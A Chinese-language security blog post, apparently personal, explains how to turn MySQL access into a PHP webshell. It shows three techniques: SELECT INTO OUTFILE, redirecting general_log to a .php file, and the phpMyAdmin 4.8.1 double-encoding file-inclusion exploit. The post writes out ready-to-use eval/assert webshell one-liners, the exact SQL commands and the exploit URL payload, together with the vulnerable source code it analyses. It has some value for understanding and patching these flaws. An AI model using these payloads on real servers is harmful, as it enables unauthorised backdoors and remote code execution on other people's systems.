NEKO

mysql->webshell

2018/06/22

参考:http://www.freebuf.com/column/143125.html
http://url.cn/5Oqx2CM

最简单的方法直接

1
select '<?php @eval($_POST[neko]);?>'INTO OUTFILE 'D:/phpStudy/PHPTutorial/WWW/neko.php';

不过mysql一般会开启–secure-file-priv选项。
查看secure_file_priv:

1
SHOW VARIABLES LIKE '%secure_file_priv%';

参数说明:
如果这个参数为空,这个变量没有效果;
如果这个参数设为一个目录名,MySQL服务只允许在这个目录中执行文件的导入和导出操作。这个目录必须存在,MySQL服务不会创建它;
如果这个参数为NULL,MySQL服务会禁止导入和导出操作。这个参数在MySQL 5.7.6版本引入

通过general_log

开启general_log选项后,所有的查询语句都会记录在general_log_file中.
依次执行:

1
2
3
set global general_log='on';
SET global general_log_file='D:/phpStudy/PHPTutorial/WWW/neko.php';
SELECT '<?php assert($_POST["neko"]);?>';

neko.php内:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
D:\phpstudy\PHPTutorial\MySQL\bin\mysqld.exe, Version: 5.5.53 (MySQL Community Server (GPL)). started with:
TCP Port: 3306, Named Pipe: MySQL
Time Id Command Argument
105 Query SHOW WARNINGS
105 Query SHOW SESSION VARIABLES LIKE 'FOREIGN_KEY_CHECKS'
106 Quit
105 Quit
180622 14:22:58 107 Connect root@localhost on
107 Query SELECT @@version, @@version_comment
107 Query SET NAMES 'utf8mb4' COLLATE 'utf8mb4_general_ci'
107 Query SET lc_messages = 'zh_CN'
180622 14:22:59 108 Connect root@localhost on
107 Query SELECT `SCHEMA_NAME` FROM `INFORMATION_SCHEMA`.`SCHEMATA`
107 Query SET collation_connection = 'utf8mb4_unicode_ci'
108 Quit
107 Quit
180622 14:23:00 109 Connect root@localhost on
109 Query SELECT @@version, @@version_comment
109 Query SET NAMES 'utf8mb4' COLLATE 'utf8mb4_general_ci'
109 Query SET lc_messages = 'zh_CN'
180622 14:23:01 110 Connect root@localhost on
109 Query SELECT `SCHEMA_NAME` FROM `INFORMATION_SCHEMA`.`SCHEMATA`
109 Query SET collation_connection = 'utf8mb4_unicode_ci'
109 Query SHOW SESSION VARIABLES LIKE 'FOREIGN_KEY_CHECKS'
109 Query SHOW SESSION VARIABLES LIKE 'FOREIGN_KEY_CHECKS'
109 Query SHOW SESSION VARIABLES LIKE 'FOREIGN_KEY_CHECKS'
109 Query SHOW SESSION VARIABLES LIKE 'FOREIGN_KEY_CHECKS'
109 Query SHOW SESSION VARIABLES LIKE 'FOREIGN_KEY_CHECKS'
109 Query SELECT '<?php assert($_POST["neko"]);?>'
109 Query SHOW WARNINGS
109 Query SELECT @@lower_case_table_names
109 Query SHOW INDEXES FROM .
109 Query SHOW SESSION VARIABLES LIKE 'FOREIGN_KEY_CHECKS'
110 Quit
109 Quit

关闭general_log:

1
set global general_log=off;

查看genera文件配置情况:

1
show global variables like "%general%";

phpmyadmin4.8.1后台getshell

chamd5团队刚发的
先在数据库neko的neko_user表里添加一个字段,名字叫:<?php @eval($_GET[neko]);?>
则D:\phpstudy\PHPTutorial\MySQL\data\neko\neko_user.frm中就会出现

1
<?php@eval($_GET[neko]);?>

不要用$_POST[neko],会报错
payload:

1
http://localhost/phpMyAdmin/index.php?target=db_sql.php%253f/../../../MySQL/data/neko/neko_user.frm&neko=phpinfo();

原理:
index.php 54~62 存在文件包含:

1
2
3
4
5
6
7
8
9
if (!empty($_REQUEST['target'])
&& is_string($_REQUEST['target'])
&& !preg_match('/^index/', $_REQUEST['target']) //不能以index开头
&& !in_array($_REQUEST['target'], $target_blacklist) //不能是import.php或export.php
&& Core::checkPageValidity($_REQUEST['target'])
) {
include $_REQUEST['target'];
exit;
}

跟进Core::checkPageValidity($_REQUEST[‘target’])
core.php 435行

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
public static function checkPageValidity(&$page, array $whitelist = []) {
if (empty($whitelist)) {
$whitelist = self::$goto_whitelist;
}
if (!isset($page) || !is_string($page)) {
return false;
}

if (in_array($page, $whitelist)) {
return true;
}
$_page = mb_substr(
$page,
0,
mb_strpos($page . '?', '?')
);
if (in_array($_page, $whitelist)) {
return true;
}
$_page = urldecode($page);
$_page = mb_substr(
$_page,
0,
mb_strpos($_page . '?', '?')
);
if (in_array($_page, $whitelist)) {
return true;
}

return false;
}

双重编码?为%253f,这样最后$_page为db_sql.php,在whitelist中.

原文作者: n3k0

发表日期: June 22nd 2018, 2:31:59

发出嘶吼: 没有魔夜2玩我要死了

CATALOG
  1. 1. 通过general_log
  2. 2. phpmyadmin4.8.1后台getshell